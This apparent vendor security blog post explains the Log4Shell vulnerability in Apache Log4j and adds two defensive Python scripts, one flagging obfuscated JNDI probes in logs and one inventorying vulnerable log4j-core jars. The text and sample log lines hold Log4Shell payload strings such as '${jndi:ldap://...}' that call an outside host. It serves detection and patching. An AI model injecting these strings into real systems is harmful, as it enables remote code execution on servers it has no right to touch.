Last week, the United States Cybersecurity and Infrastructure Security Agency (CISA) issued an alert about a new vulnerability in the Apache Log4j logging library that you should be aware of.
What you need to know
- Log4Shell (CVE-2021-44228) is a newly disclosed vulnerability in Apache Log4j that is being actively exploited in the wild and should be mitigated immediately.
- The TrustedSite platform does not rely on Log4j and is not, and has not been, vulnerable.
- New vulnerability definitions in TrustedSite’s Server and Application Scanning services will identify potentially vulnerable assets.
- Manual inspection is still required in addition to TrustedSite services: external scanning can only find the instances it can reach and trigger, not every copy of Log4j inside your applications.
The Log4Shell vulnerability lies in Apache Log4j 2's message lookup feature. When attacker-controlled text, such as a User-Agent header, a username or a search term, reaches a log call, Log4j expands ${...} expressions embedded in it, and a JNDI expression of the form ${jndi:ldap://attacker-host/path} makes the application connect to the attacker's server and load the Java class it returns, giving Remote Code Execution from a single request. The original bug (CVE-2021-44228) affects Log4j 2.0-beta9 through 2.14.1; the affected range quoted in Apache's advisories for the full series of follow-on fixes runs from 2.0-alpha7 to 2.17.0, excluding 2.3.2 and 2.12.4, which are the patched releases for the Java 6 and Java 7 branches (2.17.1 is the patched release for Java 8 and later). Attackers have already built tools that scan for and exploit the bug automatically. As reported by WIRED, Log4j is widely used in enterprise systems and web apps and it is expected that many mainstream services will be affected. Apache rates the vulnerability at “critical” severity and has published patches and mitigations.
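A first place to look for exploitation attempts is your own request logs: the probe string arrives in a header, query parameter or form field, and the automated scanners disguise the word jndi with nested lookups (${lower:j}, ${env:NaN:-j}, ${::-j}) that Log4j resolves before the JNDI lookup fires. The Python triage script below is an added example, not part of TrustedSite's post or products; the log lines are constructed and the addresses are from documentation ranges. It undoes the common transforms and reports the lines that still contain a JNDI lookup afterwards.

```python
"""Triage web/application log lines for Log4Shell probes. Added example with
constructed sample lines; the IPs are documentation addresses, not real traffic."""
import re
from dataclasses import dataclass

SAMPLE_LOG = """\
203.0.113.5 - - [10/Dec/2021:14:02:11 +0000] "GET /login HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Dec/2021:14:02:13 +0000] "GET / HTTP/1.1" 200 1024 "-" "${jndi:ldap://198.51.100.7:1389/a}"
198.51.100.7 - - [10/Dec/2021:14:02:14 +0000] "GET /?q=${${lower:j}ndi:${lower:l}dap://198.51.100.7:1389/b} HTTP/1.1" 400 0 "-" "curl/7.79"
198.51.100.9 - - [10/Dec/2021:14:02:15 +0000] "POST /api HTTP/1.1" 200 20 "${${env:NaN:-j}ndi:${::-l}dap://198.51.100.9/c}" "x"
"""

# A ${...} lookup with no other lookup nested inside it.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# What is left once the obfuscation is undone: ${jndi:<scheme>:<target>}
JNDI_LOOKUP = re.compile(r"\$\{jndi:([a-z]+):([^}]*)\}", re.IGNORECASE)


def resolve_inner(expr):
    """Approximate Log4j's evaluation of one innermost lookup, for the transforms
    attackers use to hide the word 'jndi': lower/upper, and the key:-default
    fallback (${env:NaN:-j} or ${::-j} evaluates to the default, 'j')."""
    if ":-" in expr:
        return expr.split(":-", 1)[1]
    prefix, _, value = expr.partition(":")
    if prefix.lower() == "lower":
        return value.lower()
    if prefix.lower() == "upper":
        return value.upper()
    return "${" + expr + "}"  # unknown lookup: leave it untouched


def normalize(text, max_rounds=20):
    """Collapse nested lookups innermost-first until only ${jndi:...} remains."""
    for _ in range(max_rounds):
        changed = False

        def repl(m):
            nonlocal changed
            expr = m.group(1)
            if expr.lower().startswith("jndi:"):
                return m.group(0)
            new = resolve_inner(expr)
            changed = changed or new != m.group(0)
            return new

        text = INNER_LOOKUP.sub(repl, text)
        if not changed:
            break
    return text


@dataclass
class Hit:
    line_no: int
    source_ip: str
    scheme: str
    target: str


def scan_log(text):
    """Return one Hit per line that carries a JNDI lookup after de-obfuscation."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        m = JNDI_LOOKUP.search(normalize(line))
        if m:
            hits.append(Hit(n, line.split(" ", 1)[0], m.group(1).lower(), m.group(2)))
    return hits


if __name__ == "__main__":
    for h in scan_log(SAMPLE_LOG):
        print(f"line {h.line_no}: {h.source_ip} -> {h.scheme}:{h.target}")
```

A plain search for ${jndi: misses the obfuscated forms, which is why the normalization step comes first; the transform list is deliberately small and will not catch every variant, so a clean result is no evidence, not proof of absence. Access logs also rarely record every header, so check the application's own logs, which is where the string usually ends up.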
How to protect your organization
Conduct an immediate audit of your code and deployed applications to find every dependency that pulls in Log4j, including transitive dependencies and copies bundled inside application archives and vendor products. Upgrade vulnerable versions of Log4j where possible (2.17.1, or 2.12.4 and 2.3.2 on the Java 7 and Java 6 branches) and quarantine any applications that you can’t patch; for the JNDI lookup bug in copies you cannot upgrade, Apache’s published mitigation is to remove the JndiLookup class from the log4j-core jar.
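Log4j is rarely installed as a system package; it travels inside application archives, so a package-manager query or a filename search for log4j-core-*.jar is not a complete audit. The script below is an added example (not TrustedSite tooling) that walks a directory tree, opens every jar, war, ear and zip, recurses into archives nested inside them, reads the log4j-core version from its Maven pom.properties, compares it with the patched releases (2.17.1, 2.12.4 and 2.3.2), and reports whether the JndiLookup class is still present. The sample artifacts it scans when run without arguments are constructed in a temporary directory and contain no real Log4j code.

```python
"""Inventory Log4j 2 (log4j-core) across a directory tree, including copies
bundled inside WAR/EAR/fat-jar archives, and flag versions still affected by
the Log4Shell series. Added example; the fixtures it builds are constructed."""
import io
import os
import tempfile
import zipfile
from dataclasses import dataclass

ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"

# Earliest releases that close CVE-2021-44228/-45046/-45105/-44832, per Apache.
# 2.3.x and 2.12.x are the maintained Java 6 and Java 7 branches.
FIXED_BY_BRANCH = {(2, 3): (2, 3, 2), (2, 12): (2, 12, 4)}
FIXED_DEFAULT = (2, 17, 1)


@dataclass
class Finding:
    location: str  # filesystem path; "!" separates nested archive members
    version: str  # from pom.properties, or "unknown" for shaded copies
    vulnerable: bool
    jndi_lookup_present: bool  # False if JndiLookup.class was stripped (Apache's mitigation)


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0, 0). Pre-release tags are
    dropped because every 2.x pre-release predates the fixes."""
    parts = []
    for piece in text.split("-")[0].split("."):
        digits = "".join(ch for ch in piece if ch.isdigit())
        parts.append(int(digits) if digits else 0)
    return tuple((parts + [0, 0, 0])[:3])


def is_vulnerable(version):
    v = parse_version(version)
    if v[0] != 2:  # log4j-core only exists for 2.x; 1.x (EOL) has no JNDI lookup
        return False
    return v < FIXED_BY_BRANCH.get(v[:2], FIXED_DEFAULT)


def _read_version(zf):
    try:
        props = zf.read(POM_PROPS).decode("utf-8", "replace")
    except KeyError:
        return None
    for line in props.splitlines():
        if line.startswith("version="):
            return line.split("=", 1)[1].strip()
    return None


def scan_archive(zf, location, findings):
    names = set(zf.namelist())
    version = _read_version(zf)
    if version is not None:
        findings.append(Finding(location, version, is_vulnerable(version),
                                JNDI_LOOKUP_CLASS in names))
    elif JNDI_LOOKUP_CLASS in names:
        # log4j-core shaded into another jar without Maven metadata: the version
        # is unknown, so report it as vulnerable until someone checks by hand.
        findings.append(Finding(location, "unknown", True, True))
    for name in names:  # recurse into bundled archives (WEB-INF/lib/*.jar, ...)
        if name.lower().endswith(ARCHIVE_EXT):
            try:
                with zipfile.ZipFile(io.BytesIO(zf.read(name))) as inner:
                    scan_archive(inner, location + "!" + name, findings)
            except zipfile.BadZipFile:
                continue


def scan_tree(root):
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for fn in filenames:
            if fn.lower().endswith(ARCHIVE_EXT):
                path = os.path.join(dirpath, fn)
                try:
                    with zipfile.ZipFile(path) as zf:
                        scan_archive(zf, path, findings)
                except zipfile.BadZipFile:
                    continue
    return findings


def build_sample_tree(root):
    """Constructed fixtures, not real Apache artifacts: a 2.14.1 jar bundled in a
    WAR, a patched 2.17.1 jar, and a 2.12.2 jar with JndiLookup.class removed."""
    def core_jar(version, with_jndi=True):
        buf = io.BytesIO()
        with zipfile.ZipFile(buf, "w") as zf:
            zf.writestr(POM_PROPS, f"artifactId=log4j-core\nversion={version}\n")
            if with_jndi:
                zf.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")  # placeholder bytes
        return buf.getvalue()
    apps = os.path.join(root, "apps")
    os.makedirs(apps, exist_ok=True)
    with zipfile.ZipFile(os.path.join(apps, "shop.war"), "w") as war:
        war.writestr("WEB-INF/lib/log4j-core-2.14.1.jar", core_jar("2.14.1"))
    with open(os.path.join(apps, "log4j-core-2.17.1.jar"), "wb") as f:
        f.write(core_jar("2.17.1"))
    with open(os.path.join(apps, "log4j-core-2.12.2.jar"), "wb") as f:
        f.write(core_jar("2.12.2", with_jndi=False))


def demo():
    """Scan the constructed fixtures; returns {version: (vulnerable, jndi_present, location)}."""
    root = tempfile.mkdtemp()
    build_sample_tree(root)
    return {f.version: (f.vulnerable, f.jndi_lookup_present, f.location)
            for f in scan_tree(root)}


if __name__ == "__main__":
    import sys
    root = sys.argv[1] if len(sys.argv) > 1 else tempfile.mkdtemp()
    if len(sys.argv) == 1:
        build_sample_tree(root)
    for f in scan_tree(root):
        print("VULNERABLE" if f.vulnerable else "ok", f.version,
              "jndi_lookup=%s" % f.jndi_lookup_present, f.location)
```

Run it with a directory argument to scan a real tree. A jar that carries JndiLookup.class but no pom.properties is reported with version unknown and treated as vulnerable: that is what a shaded or repackaged copy looks like, and it needs a manual check. For source trees, the build tool's dependency report (for example mvn dependency:tree) is the complementary check, because a transitive dependency can pull in log4j-core without it appearing anywhere in your own code.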
It’s never been more important to know your true attack surface
With this announcement of the latest critical vulnerability, it’s important to remember that you can’t protect what you don’t know about. If your organization has lost sight of digital assets over the years, it’s possible you could be susceptible to the Log4Shell vulnerability and not realize it. Practicing attack surface management can help ensure you’ve cataloged every asset you have exposed to the internet. With a complete inventory of your attack surface, you can be more confident that no vulnerabilities are hiding in the shadows.
TrustedSite offers a complete attack surface management solution that can help you stay protected from vulnerabilities like Log4Shell. Get started with a free trial.